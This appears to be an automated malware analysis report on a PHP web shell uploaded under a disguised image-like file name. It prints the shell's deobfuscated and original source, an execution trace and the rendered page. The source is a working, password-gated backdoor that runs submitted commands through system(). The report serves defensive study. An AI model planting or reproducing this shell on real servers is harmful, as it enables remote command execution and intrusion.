PHP Malware Analysis
webfuck.jpg.php5
md5: 4a53e9c3488f8c7ea93c9f1a75b25c91
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Original)
Title
- [ d1sx ] (Deobfuscated, HTML, Original)
URLs
- https://i.im.ge/2022/06/10/rzuzlc.jpg (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<html>
<head>
<title> [ d1sx ] </title>
</head>
<body bgcolor="black">
<center>
<p style="color:#008000">
<?php
if ($_COOKIE['password'] == "haxor1337") {
echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
echo system($_POST['cmd']);
echo "</p>";
} else {
echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
}
if ($_POST['pasw'] == "haxor1337") {
$value = "haxor1337";
setcookie("password", $value);
}
?>
</p>
</center>
</body>
</html>
/*
# --{*********}-- #
# author: d1sx #
# date x/x/2022 #
# --{*********}-- #
*/
<?php
echo system([cmd]);Execution traces
data/traces/4a53e9c3488f8c7ea93c9f1a75b25c91_trace-1676255194.6092.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:00.507088]
1 0 1 0.000195 393576
1 3 0 0.000264 397104 {main} 1 /var/www/html/uploads/webfuck.jpg.php5 0 0
2 4 0 0.000316 397480 system 0 /var/www/html/uploads/webfuck.jpg.php5 34 1 [0 => 'cmd']
2 4 1 0.000340 397512
2 4 R FALSE
1 3 1 0.000356 397104
0.000381 314264
TRACE END [2023-02-13 00:27:00.507310]
Generated HTML code
<html><head>
<title> [ d1sx ] </title>
</head>
<body bgcolor="black">
<center>
<p style="color:#008000">
password</p><form method="POST"><input type="password" name="pasw"><input type="submit"></form><img src="https://i.im.ge/2022/06/10/rzuzlc.jpg" alt="rzuzlc.jpg" border="0"> <p></p>
</center>
/*
# --{*********}-- #
# author: d1sx #
# date x/x/2022 #
# --{*********}-- #
*/
</body></html>Original PHP code
<html>
<head>
<title> [ d1sx ] </title>
</head>
<body bgcolor="black">
<center>
<p style="color:#008000">
<?php
if($_COOKIE['password'] == "haxor1337"){
echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
echo system($_POST['cmd']);
echo "</p>";
}else{
echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
}
if($_POST['pasw'] == "haxor1337"){
$value = "haxor1337";
setcookie("password", $value);
}
?>
</p>
</center>
</body>
</html>
/*
# --{*********}-- #
# author: d1sx #
# date x/x/2022 #
# --{*********}-- #
*/
<?php echo system([cmd]); ?>